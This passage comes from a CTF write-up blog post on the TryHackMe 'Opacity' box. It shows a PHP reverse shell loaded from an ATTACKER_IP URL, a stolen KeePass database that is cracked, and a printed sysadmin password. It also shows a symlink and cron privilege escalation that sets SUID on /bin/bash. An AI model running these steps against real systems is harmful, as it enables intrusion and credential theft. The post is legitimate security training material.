<p>PHP code execution!!! Let’s leverage this into a full RCE. And a shoutout to John Hammond.</p>

<h2 id="rce"><span class="me-2">RCE</span><a href="#rce" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>First things first I set up a <code class="language-plaintext highlighter-rouge">pwncat</code> listener on port <code class="language-plaintext highlighter-rouge">9999</code>.
Then I grabbed the pentest monkey’s PHP <a href="https://github.com/pentestmonkey/php-reverse-shell">reverse shell</a>. I modified the IP and the PORT to match mine, placed it in the directory where my HTTP server is running (<code class="language-plaintext highlighter-rouge">~/Pictures/Chroot/</code>), and renamed it <code class="language-plaintext highlighter-rouge">rev.php</code>. Finally I asked the webapp to load this <em>“image”</em> :</p>

<div file="target_url" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="target_url"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>http://ATTACKER_IP/rev.php#myfile.png
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/opacity/shellll.gif" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/shellll.gif" alt="xsserve"  loading="lazy"></a></p>

<p>As you can see the webapp downloads the <code class="language-plaintext highlighter-rouge">rev.php</code> file from my HTTP server and tries to display it. Since it’s a PHP file, it gets interpreted by the web server, and I get my reverse shell !</p>

<h1 id="privesc">Privesc</h1>

<h2 id="manual-privesc"><span class="me-2">Manual privesc</span><a href="#manual-privesc" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>I was just poking aroung, looking at common directories, and I found this:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@opacity:/<span class="nv">$ </span><span class="nb">cd</span> /opt
<span class="o">(</span>remote<span class="o">)</span> www-data@opacity:/opt<span class="nv">$ </span><span class="nb">ls
</span>dataset.kdbx
</pre></td></tr></tbody></table></code></div></div>

<p>This looks like a KeyPass password database ! Let’s download it on our machine.</p>

<p><a href="/assets/img/writeups/thm/opacity/kdbxfile.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/kdbxfile.png" alt="xsserve"  loading="lazy"></a>
<em>Exfiltrating the KDBX file</em></p>

<p>Unfortunately this type of file is protected by a password (called “master key”). Fortunately, we can crack it using <code class="language-plaintext highlighter-rouge">keepass2john</code> and <a href="https://www.kali.org/tools/john/">john</a></p>

<p><a href="/assets/img/writeups/thm/opacity/master_password_cracked.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/master_password_cracked.png" alt="xsserve"  loading="lazy"></a>
<em>Cracking it with john</em></p>

<p>All that’s left is to open the KeePass file, input the master key, and steal the protected passwords.</p>

<p><a href="/assets/img/writeups/thm/opacity/openning_it.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/openning_it.png" alt="xsserve"  loading="lazy"></a>
<a href="/assets/img/writeups/thm/opacity/getting_sysadmin_password.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/getting_sysadmin_password.png" alt="xsserve"  loading="lazy"></a>
<em>Inputing the master key and stealing the password</em></p>

<div file="creds.txt" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="creds.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>sysadmin : Cl0udP4ss40p4city#8700
</pre></td></tr></tbody></table></code></div></div>

<h2 id="sysadmin"><span class="me-2">Sysadmin</span><a href="#sysadmin" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@opacity:/<span class="nv">$ </span><span class="nb">ls</span> /home
sysadmin
</pre></td></tr></tbody></table></code></div></div>
<p>Sysadmin is a user on this host.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@opacity:/opt<span class="nv">$ </span>su sysadmin
Password: Cl0udP4ss40p4city#8700
sysadmin@opacity:/opt<span class="err">$</span>
</pre></td></tr></tbody></table></code></div></div>

<p>I tried automatic enumeration with <a href="https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS">LinPEAS</a> but it didn’t find anything. So, I checked in the sysadmin’s <code class="language-plaintext highlighter-rouge">home</code> directory and found a backup script:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>sysadmin@opacity:~/scripts<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-R</span> <span class="nb">.</span>

.:
lib  script.php

./lib:
application.php  bio2rdfapi.php      dataresource.php  fileapi.php  phplib.php  registry.php  xmlapi.php
backup.inc.php   biopax2bio2rdf.php  dataset.php       owlapi.php   rdfapi.php  utils.php
</pre></td></tr></tbody></table></code></div></div>

<p>All these files are owned by root. Let’s take a look at the <code class="language-plaintext highlighter-rouge">script.php</code> code (here’s a simplified version):</p>

<div class="language-php highlighter-rouge"><div class="code-header">
        <span data-label-text="PHP"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="cp">&lt;?php</span>

<span class="c1">//Backup of scripts sysadmin folder</span>
<span class="k">require_once</span><span class="p">(</span><span class="s1">'lib/backup.inc.php'</span><span class="p">);</span>
<span class="nf">zipData</span><span class="p">(</span><span class="s1">'/home/sysadmin/scripts'</span><span class="p">,</span> <span class="s1">'/var/backups/backup.zip'</span><span class="p">);</span>

<span class="c1">//Files scheduled removal</span>
<span class="nv">$dir</span> <span class="o">=</span> <span class="s2">"/var/www/html/cloud/images"</span><span class="p">;</span>
<span class="k">foreach</span> <span class="p">(</span> <span class="nf">files_of</span><span class="p">(</span><span class="nv">$dir</span><span class="p">)</span> <span class="k">as</span> <span class="nv">$file</span> <span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="nv">$file</span><span class="o">-&gt;</span><span class="nf">isDir</span><span class="p">())</span> 
        <span class="nb">rmdir</span><span class="p">(</span><span class="nv">$file</span><span class="p">);</span>
    <span class="k">else</span><span class="o">:</span>
        <span class="nb">unlink</span><span class="p">(</span><span class="nv">$file</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Alright, so this script basically does two things</p>
<ul>
  <li>zip <code class="language-plaintext highlighter-rouge">/home/sysadmin/scripts</code> in <code class="language-plaintext highlighter-rouge">/var/backups/backup.zip</code></li>
  <li>delete all images in <code class="language-plaintext highlighter-rouge">/var/www/html/cloud/images</code></li>
</ul>

<p>Remember earlier ? The website’s name was <code class="language-plaintext highlighter-rouge">5 minutes upload</code>. That means that <code class="language-plaintext highlighter-rouge">root</code> probably executes (via a cronjob or something) the <code class="language-plaintext highlighter-rouge">script.php</code> every <code class="language-plaintext highlighter-rouge">5</code> minutes.</p>

<p>To escalate privileges we could simply modify the <code class="language-plaintext highlighter-rouge">lib/backup.inc.php</code> file, inject some malicious code, wait <code class="language-plaintext highlighter-rouge">5</code> minutes and ggs.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>sysadmin@opacity:~/scripts<span class="nv">$ </span><span class="nb">echo</span> <span class="o">&gt;</span> lib/backup.inc.php
bash: scripts/lib/backup.inc.php: Permission denied
sysadmin@opacity:~/scripts<span class="nv">$ </span><span class="nb">echo</span> <span class="o">&gt;</span> lib/whatever.php
sysadmin@opacity:~/scripts<span class="nv">$ </span>
</pre></td></tr></tbody></table></code></div></div>

<p>But here is the problem. We can’t write to <code class="language-plaintext highlighter-rouge">lib/backup.inc.php</code> (cause it’s owned by root). However we can create files in <code class="language-plaintext highlighter-rouge">lib/</code>. 
So I thought: if we could somehow delete <code class="language-plaintext highlighter-rouge">lib/backup.inc.php</code>, we could then create a new one with malicious code, wait 5 minutes, and gain root privileges.</p>

<p>But the question is how do we delete it ?</p>

<h2 id="gaining-root"><span class="me-2">Gaining root</span><a href="#gaining-root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="theory"><span class="me-2">Theory</span><a href="#theory" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>While reading the PHP doc for <a href="https://www.php.net/manual/en/function.unlink.php">unlink</a> I found this interesting detail:</p>

<blockquote>
  <p>If the file is a symlink, the symlink will be deleted.</p>
</blockquote>

<p>If <code class="language-plaintext highlighter-rouge">/var/www/html/cloud/images/</code> was a symlink to <code class="language-plaintext highlighter-rouge">~/scripts/lib/</code>, then when root tries to delete all files from <code class="language-plaintext highlighter-rouge">/var/www/html/cloud/images</code>, <code class="language-plaintext highlighter-rouge">unlink</code> would follow the symlink, so root would in fact delete all files in <code class="language-plaintext highlighter-rouge">~/scripts/lib/</code>.</p>

<p>At that point I’d be able to create a malicious <code class="language-plaintext highlighter-rouge">~/scripts/lib/backup.inc.php</code>. After <code class="language-plaintext highlighter-rouge">5</code> minutes, root would execute <code class="language-plaintext highlighter-rouge">~/scripts/script.php</code>, including our malicious library, and gg.</p>

<h3 id="practice"><span class="me-2">Practice</span><a href="#practice" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Here’s the process I followed step-by-step to set up the symlink and get root to delete their own files. First I need to be www-data (cause it have own on <code class="language-plaintext highlighter-rouge">/var/www/html/cloud/</code>).</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td><td class="rouge-code"><pre><span class="c"># Step 1: Make sure `sysadmin` can create the symlink here</span>
www-data@opacity:~/opt<span class="nv">$ </span><span class="nb">chmod </span>777 /var/www/html/cloud/

<span class="c"># Step 2: Remove the existing images/ directory.</span>
www-data@opacity:~/opt<span class="nv">$ </span><span class="nb">rm</span> <span class="nt">-rf</span> /var/www/html/cloud/images

<span class="c"># Step 3: Switch to the sysadmin user to create the symlink.</span>
www-data@opacity:~/opt<span class="nv">$ </span>su sysadmin
Password: Cl0udP4ss40p4city#8700

<span class="c"># Step 4: Navigate to the sysadmin's home directory.</span>
sysadmin@opacity:~/opt<span class="nv">$ </span><span class="nb">cd</span> /home/sysadmin

<span class="c"># Step 5: Create the symlink we discussed earlier.</span>
sysadmin@opacity:~/home/sysadmin<span class="nv">$ </span><span class="nb">ln</span> <span class="nt">-sf</span> /home/sysadmin/scripts/lib /var/www/html/cloud/images

<span class="c"># Step 6: Verify the contents of the lib directory.</span>
sysadmin@opacity:~/home/sysadmin<span class="nv">$ </span><span class="nb">ls </span>scripts/lib 
application.php  bio2rdfapi.php      dataresource.php  fileapi.php  phplib.php  registry.php  whatever.php
backup.inc.php   biopax2bio2rdf.php  dataset.php       owlapi.php   rdfapi.php  utils.php     xmlapi.php

<span class="c"># Step 7: Wait for 5 minutes for the cron job to execute.</span>

<span class="c"># Step 8: Verify that root has deleted their own files.</span>
sysadmin@opacity:~/home/sysadmin<span class="nv">$ </span><span class="nb">ls </span>scripts/lib

<span class="c"># files are gone!</span>
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/opacity/root_remove_his_files.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/root_remove_his_files.png" alt="xsserve"  loading="lazy"></a>
<em>Nice !</em></p>

<p>And now, all that’s left is to create a malicious <code class="language-plaintext highlighter-rouge">~/scripts/lib/backup.inc.php</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre><span class="c"># Step 1: Trick root into setting the SUID bit on /bin/bash. </span>
sysadmin@opacity:~/home/sysadmin<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'&lt;?php shell_exec("chmod +s /bin/bash"); ?&gt;'</span>

<span class="c"># Step 2: Verify the current permissions of /bin/bash.</span>
sysadmin@opacity:~/home/sysadmin<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /bin/bash
<span class="nt">-rwxr-xr-x</span> 1 root root 1183448 Apr 18  2022 /bin/bash

<span class="c"># Step 3: Wait for 5 minutes for the cron job to execute.</span>

<span class="c"># Step 4: Check the permissions of /bin/bash again.</span>
sysadmin@opacity:~/home/sysadmin<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /bin/bash
<span class="nt">-rwsr-sr-x</span> 1 root root 1183448 Apr 18  2022 /bin/bash

<span class="c"># The SUID bit has been set by root!</span>
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/opacity/PRIVESCROOT.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/PRIVESCROOT.png" alt="xsserve"  loading="lazy"></a></p>

<h2 id="root"><span class="me-2">Root</span><a href="#root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>To gain root access we need to execute <code class="language-plaintext highlighter-rouge">/bin/bash</code> with the <code class="language-plaintext highlighter-rouge">-p</code> option</p>

<blockquote>
  <p>If the <code class="language-plaintext highlighter-rouge">-p</code> option is supplied at invocation, the effective user id is not reset.</p>
</blockquote>

<p>This means we retain our UID, GID, and all related attributes, but the EUID (Effective User ID) and EGID (Effective Group ID) are <strong>NOT</strong> reset to ours. Since it’s an SUID binary, they are set to the UID/GID of the owner (root).</p>

<p>With this, we can execute commands as root:</p>

<p><a href="/assets/img/writeups/thm/opacity/rooted.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/rooted.png" alt="xsserve"  loading="lazy"></a></p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/writeups/">Writeups</a>,
          <a href="/categories/tryhackme/">TryHackMe</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/writeups/"
            class="post-tag no-text-decoration"
          >writeups</a>
        
          <a
            href="/tags/tryhackme/"
            class="post-tag no-text-decoration"
          >tryhackme</a>
        
          <a
            href="/tags/web/"
            class="post-tag no-text-decoration"
          >web</a>
        
          <a
            href="/tags/php/"
            class="post-tag no-text-decoration"
          >php</a>
        
          <a
            href="/tags/file-upload/"
            class="post-tag no-text-decoration"
          >file-upload</a>
        
          <a
            href="/tags/pwncat/"
            class="post-tag no-text-decoration"
          >pwncat</a>
        
          <a
            href="/tags/linux-privesc/"
            class="post-tag no-text-decoration"
          >linux-privesc</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Opacity%20-%20NullBrunk&url=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fthm-opacity%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Opacity%20-%20NullBrunk&u=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fthm-opacity%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fthm-opacity%2F&text=Opacity%20-%20NullBrunk" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

            
          </main>

         
            <!-- panel -->
            <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
              <div class="access">
                





                

  <section>
      <h2 class="panel-heading no-border">Tags</h2>

      <nav id="toc">
        <div class="d-flex flex-wrap mt-3 mb-1 me-3">
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/php/">php</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/file-upload/">file-upload</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/pwncat/">pwncat</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/linux-privesc/">linux-privesc</a>
          
        </div>
      </nav>
  </section>


              </div>

              
                
                






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-1 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

              
            </aside>
          
        </div>

        <div class="row">
          <!-- tail -->

          
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/thm-blog/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735401600"
  data-df="ll"
  
>
  Dec 28, 2024
</time>

              <h4 class="pt-0 my-2">Blog</h4>
              <div class="text-muted">
                <p>Billy Joel made a Wordpress blog!</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/thm-whiterose/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735747200"
  data-df="ll"
  
>
  Jan  1, 2025
</time>

              <h4 class="pt-0 my-2">Whiterose</h4>
              <div class="text-muted">
                <p>Yet another Mr. Robot themed challenge.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/wonderland/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735660800"
  data-df="ll"
  
>
  Dec 31, 2024
</time>

              <h4 class="pt-0 my-2">Wonderland</h4>
              <div class="text-muted">
                <p>Fall down the rabbit hole and enter wonderland.</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      

  <section>
      <h2 class="panel-heading no-border">Tags</h2>

      <nav id="toc">
        <div class="d-flex flex-wrap mt-3 mb-1 me-3">
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/poc/">poc</a>
          
        </div>
      </nav>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

